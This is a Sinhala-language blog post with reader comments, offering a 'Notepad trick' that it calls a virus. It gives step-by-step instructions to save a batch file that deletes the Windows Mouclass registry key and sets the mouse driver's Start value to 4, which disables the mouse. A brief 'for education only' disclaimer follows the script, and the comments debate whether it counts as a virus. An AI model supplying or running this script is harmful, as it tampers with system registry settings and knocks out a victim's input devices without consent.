හරි එහෙනම් වැඩේ පටා...න් ගමු නේද.එහෙනම් වෙනදා වගේ Notepad එක Open කරගෙන වැඩේට ලෑස්ති වෙන්න්කෝ.
01.මුලින්ම Notepad එක Open කරගන්න දන්නැත්තම් මෙහෙම යන්න. Start-Allprogarm-Accessories-Notepad
02.දැන් මං පහලින් දාලා තියෙන Code ටික Notepad එකට Copy/past කරන්න.
03.දැන් Save as ගිහින් Mouse.bat කියල ගහලා Save කරගන්න.
04.අන්තිමට .bat කියලා ගහන්න ඕනි.Mouse කියන තැනට ඕයාලා කැමති නමක් දාගෙන Save කරගන්න.
මෙන්න කෝඩ් ටික
rem ---------------------------------
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)
ela ela top mcn... (o)
ReplyDelete:-d
ReplyDelete:-?
Delete:d :)
Deletemewa vitus newei vb scrips vitharane virus kiyana nama mrwata danna epa.
ReplyDeleteමේක කෙටියෙන්ම කිව්වොත් Notepad Trick එකක්.මේකෙන් වෙන්නේ Mouse එක Disable :p වෙන එක ඉතිං මං හිතුවා ''Virus'' යන වචනය දැම්මෙත් වඩාත් උචිතයි කියලා ඔයා ඒක වෙන විදිහකට තේරුම් අරන් ඇති බව උඩ Comment :o එක දැක්කම පේනවා.මොනා උනත් අදහස් දැක්වුවාට ස්තූති..! :) (h)
Delete